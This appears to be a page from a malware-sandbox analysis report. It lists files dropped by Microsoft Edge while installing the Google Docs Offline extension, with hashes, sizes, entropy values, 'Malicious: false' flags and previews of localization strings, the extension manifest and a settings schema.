SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11406
Entropy (8bit):	5.745845607168024
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
MD5:	0A68C9539A188B8BB4F9573F2F2321D6
SHA1:	E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
SHA-256:	39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
SHA-512:	13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417954053901
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
MD5:	5E425DC36364927B1348F6C48B68C948
SHA1:	9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
SHA-256:	32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
SHA-512:	C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	122218
Entropy (8bit):	5.439997574414675
Encrypted:	false
SSDEEP:	1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
MD5:	67C4451398037DD1C497A1EA98227630
SHA1:	F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
SHA-256:	59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
SHA-512:	17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
Malicious:	false
